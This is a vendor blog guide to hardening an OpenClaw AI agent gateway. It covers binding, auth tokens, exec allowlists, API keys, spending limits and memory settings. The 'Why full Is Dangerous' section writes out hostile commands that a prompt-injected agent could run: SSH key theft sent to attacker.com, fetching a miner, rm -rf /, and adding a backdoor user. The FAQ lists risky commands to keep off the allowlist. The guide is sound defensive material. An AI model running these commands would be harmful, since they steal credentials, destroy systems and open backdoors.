Blog/OpenClaw Gateway Configuration Best Practices (2026 Guide)

gatewayconfigurationguideopenclaw

OpenClaw Gateway Configuration Best Practices (2026 Guide)

Milo•February 24, 2026•10 min read

TL;DR

The gateway is the brain of your OpenClaw deployment. Three settings matter most: bind to 127.0.0.1 (not 0.0.0.0), enable strong auth tokens, and set exec to allowlist. Get these three right and you've eliminated 90% of attack surface. This guide covers every critical setting.

Critical Gateway Settings Reference

Setting	Recommended Value	Default	Risk if Misconfigured
`gateway.host`	`127.0.0.1`	`0.0.0.0` ⚠️	Full public exposure — anyone can control your agent
`gateway.port`	`3000` (or custom)	`3000`	Minor — just use a non-standard port if exposed
`gateway.auth.allowedKeys`	32+ char random string	None ⚠️	Zero authentication — full unauthorized access
`exec.security`	`allowlist`	`full` ⚠️	Arbitrary command execution via prompt injection
`exec.allowedCommands`	Specific commands only	All ⚠️	Attacker can run any command on your system
`model.apiKey`	Environment variable	Plaintext in config	Key theft if config is exposed
`model.model`	Your choice	Provider default	Cost — some models are 100x more expensive
`model.maxTokens`	Set a limit	Unlimited ⚠️	Token blowout — unexpected API bills
`memory.maxContextTokens`	100K-200K	Model max	Context overflow, degraded responses
`channels.*.allowedUsers`	Specific IDs	All ⚠️	Anyone in the channel can control your agent

Section 1: Network & Access Control

Binding Address

The single most critical setting. This determines who can reach your gateway.

# ✅ CORRECT — only accessible locally
gateway:
  host: 127.0.0.1
  port: 3000

# ❌ DANGEROUS — accessible from the entire internet
gateway:
  host: 0.0.0.0
  port: 3000

If you need remote access, use a reverse proxy:

# Caddy (automatic HTTPS)
openclaw.yourdomain.com {
  reverse_proxy localhost:3000
  basicauth {
    admin $2a$14$your_bcrypt_hash
  }
}

Authentication Tokens

Always set strong, unique auth tokens:

gateway:
  auth:
    allowedKeys:
      - "kJ8x#mP2$vN9qR4wT6yB3cF7hL0sD5a"  # At least 32 characters

Token generation best practice:

# Generate a cryptographically random token
openssl rand -hex 32

Never use:

changeme, admin, password123

Short tokens (< 16 characters)

The same token across multiple instances

Tokens committed to git repositories

Channel Access Control

Restrict who can talk to your agent on each channel:

channels:
  discord:
    token: "your-bot-token"
    allowedGuilds:
      - "123456789"  # Only your server
    allowedUsers:
      - "your-user-id"  # Only you
  telegram:
    token: "your-bot-token"
    allowedUsers:
      - "your-telegram-id"

Without allowedUsers, anyone who discovers your bot can interact with it and potentially exploit it through prompt injection.

Section 2: Exec Permissions

Security Modes

OpenClaw has three exec security modes:

Mode	What It Allows	When to Use
`deny`	No command execution	Maximum security, limited agent
`allowlist`	Only listed commands	Recommended for most users
`full`	Any command	Never in production

# ✅ RECOMMENDED — specific commands only
exec:
  security: allowlist
  allowedCommands:
    - git
    - npm
    - node
    - python3
    - ls
    - cat
    - mkdir
    - cp

# ❌ DANGEROUS — agent can run anything
exec:
  security: full

Why `full` Is Dangerous

With exec: full, a prompt injection attack can:

# Exfiltrate your SSH keys
cat ~/.ssh/id_rsa | curl -X POST https://attacker.com/steal -d @-

# Install a cryptocurrency miner
wget https://attacker.com/miner && chmod +x miner && ./miner

# Destroy your system
rm -rf / --no-preserve-root

# Add a backdoor user
useradd -m -s /bin/bash backdoor && echo 'backdoor:password' | chpasswd

These aren't theoretical — they're happening to exposed instances right now.

Section 3: Model Configuration

API Key Management

Never put API keys directly in your config file:

# ❌ BAD — key in plaintext config
model:
  apiKey: "sk-ant-api03-xxxxx"

# ✅ GOOD — use environment variables
model:
  apiKey: "$ANTHROPIC_API_KEY"

Set the environment variable in your shell profile:

export ANTHROPIC_API_KEY="sk-ant-api03-xxxxx"

Preventing Token Blowout

Without limits, a runaway agent or prompt injection can rack up massive API bills:

model:
  provider: anthropic
  model: claude-sonnet-4-20250514
  maxTokens: 4096          # Max tokens per response
  maxBudgetPerDay: 10.00   # Daily spending cap in USD

Real-world token blowout scenarios:

Agent enters infinite loop calling itself → thousands of API requests

Malicious skill triggers massive context expansion → expensive completions

Unattended agent processes spam → burns through budget overnight

Model Selection

Model	Cost (per 1M tokens)	Best For
Claude Haiku	~$0.25 input / $1.25 output	Simple tasks, high volume
Claude Sonnet	~$3 input / $15 output	General purpose (recommended)
Claude Opus	~$15 input / $75 output	Complex reasoning, code
GPT-4o	~$2.50 input / $10 output	General purpose alternative
GPT-4o-mini	~$0.15 input / $0.60 output	Budget option
Gemini 2.5 Flash	~$0.15 input / $0.60 output	Fast, cheap, good enough
Gemini 2.5 Pro	~$1.25 input / $10 output	Complex tasks, long context

Recommendation: Start with Sonnet or GPT-4o for general use. Use Haiku/Flash for high-volume, simple tasks. Only use Opus for complex reasoning you can't get from Sonnet.

Section 4: Memory & Context Management

Context Window Limits

memory:
  maxContextTokens: 150000  # Don't let context grow unbounded
  compactionThreshold: 120000  # Compact before hitting the limit
  compactionStrategy: summary  # or 'truncate'

What happens without limits:

Context grows until it hits the model's maximum

Each request becomes more expensive (you pay for the full context)

Response quality degrades as context gets noisy

Eventually the model fails or produces garbage

Compaction Strategies

Strategy	How It Works	Pros	Cons
`summary`	LLM summarizes old context	Preserves key information	Uses API call to summarize
`truncate`	Drops oldest messages	Simple, no extra cost	Loses information permanently
`sliding`	Keeps last N messages	Predictable memory use	Fixed window, no prioritization

Recommendation: Use summary for agents that have long-running tasks. Use truncate for simple chatbots. Use sliding if you want predictable costs.

Section 5: Rate Limiting & Abuse Prevention

gateway:
  rateLimit:
    maxRequestsPerMinute: 30
    maxRequestsPerHour: 500
    cooldownSeconds: 60

Rate limiting prevents:

API cost runaway from rapid-fire requests

DoS attacks if your gateway is accidentally exposed

Infinite loop scenarios where the agent calls itself

Complete Recommended Configuration

gateway:
  host: 127.0.0.1
  port: 3000
  auth:
    allowedKeys:
      - "$OPENCLAW_AUTH_TOKEN"
  rateLimit:
    maxRequestsPerMinute: 30
    maxRequestsPerHour: 500

model:
  provider: anthropic
  apiKey: "$ANTHROPIC_API_KEY"
  model: claude-sonnet-4-20250514
  maxTokens: 4096
  maxBudgetPerDay: 10.00

exec:
  security: allowlist
  allowedCommands:
    - git
    - npm
    - node
    - python3
    - ls
    - cat
    - mkdir

memory:
  maxContextTokens: 150000
  compactionThreshold: 120000
  compactionStrategy: summary

channels:
  discord:
    token: "$DISCORD_BOT_TOKEN"
    allowedGuilds:
      - "your-guild-id"
    allowedUsers:
      - "your-user-id"

FAQ

Q: What's the most important gateway setting?

gateway.host: 127.0.0.1. This single setting prevents your agent from being accessible on the public internet. It eliminates 90% of the attack surface. Everything else is secondary.

Q: How do I prevent token blowout?

Three layers: (1) Set maxTokens to limit per-response costs. (2) Set maxBudgetPerDay as a spending cap. (3) Set memory.maxContextTokens to prevent context from growing unbounded. Together, these cap your maximum daily spend.

Q: Should I use auth tokens or IP allowlisting?

Both if possible. Auth tokens (allowedKeys) are essential — they verify identity. IP allowlisting adds a second layer by restricting where requests can come from. But IP allowlisting alone isn't enough because IPs can be spoofed or change.

Q: What exec commands should I allowlist?

Only the commands your agent actually needs. Start with nothing (deny) and add commands as you discover your agent needs them. Common safe additions: git, npm, node, python3, ls, cat, mkdir. Never add: rm, sudo, chmod, curl, wget unless you have a specific, controlled use case.

Q: How do I know if my gateway config is secure?

Run the free security audit at getmilo.dev — paste your config and get an instant A-F score with specific recommendations. For ongoing monitoring, Milo Shield checks your config continuously and alerts on drift.

*Audit your gateway config free →*

*Interactive setup wizard →*

*Get Milo Shield for ongoing monitoring →*

Keep Reading

OpenClaw Cost Management: Stop Your AI Agent From Burning Money

How to track, control, and optimize your OpenClaw inference spending. Includes model pricing comparison, waste detection patterns, and budget management strategies.

→

OpenClaw Hosting Options Compared: Self-Host vs Managed vs Cloud (2026)

Honest comparison of every way to host OpenClaw in 2026 — self-hosting on VPS/Pi, SimpleClaw, Clawctl, hostmenow, Majordomo, and cloud providers. Prices, pros, cons, and security defaults.

→

OpenClaw Backup & Disaster Recovery: Don't Lose Your Agent's Brain

Your OpenClaw agent's memory, skills, and config are one bad command away from disappearing. Here's the complete guide to backing up everything that matters and recovering fast when things go wrong.

→

Secure your OpenClaw deployment

Run a free security scan or get Milo Shield for comprehensive automated protection.

Free Security Scan →Get Milo Shield — $29

Get security updates

New vulnerabilities, hardening guides, and tool updates — straight to your inbox. One email per week, max.